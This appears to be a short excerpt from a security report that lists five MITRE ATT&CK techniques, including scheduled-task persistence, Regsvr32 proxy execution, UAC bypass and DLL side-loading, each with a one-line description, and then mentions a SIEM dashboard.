MITRE ATT&CK techniques
The following MITRE attack techniques are describes how this is done.
T1053.005 – Scheduled Task/JobAdversaries may use task scheduling to execute programs at system startup or on a scheduled basis for persistence.
T1218.010 – Signed Binary Proxy Execution: Regsvr32Regsvr32.exe is a Microsoft signed command-line program, which is used to register and unregister object linking and embedding controls, such as dynamic link libraries (DLLs), on Windows machines.
T1518.001 – Software Discovery: Security Software DiscoveryThis technique aims to get a list of installed security software or defensive programs, available on a system or in a cloud environment. The results obtained can be used to shape subsequent attacks.
T1548.002 – Abuse Elevation Control Mechanism: Bypass User Account ControlAn attacker may bypass User Access Control (UAC) mechanisms to escalate privileges on the system.
T1574.002 – Hijack Execution Flow: DLL Side-LoadingAdversaries may execute their own malicious payloads by side-loading DLLs. This technique involves hijacking a DLL that a legitimate application loads.
Example of SIEM Dashboard MITRE ATT&CK
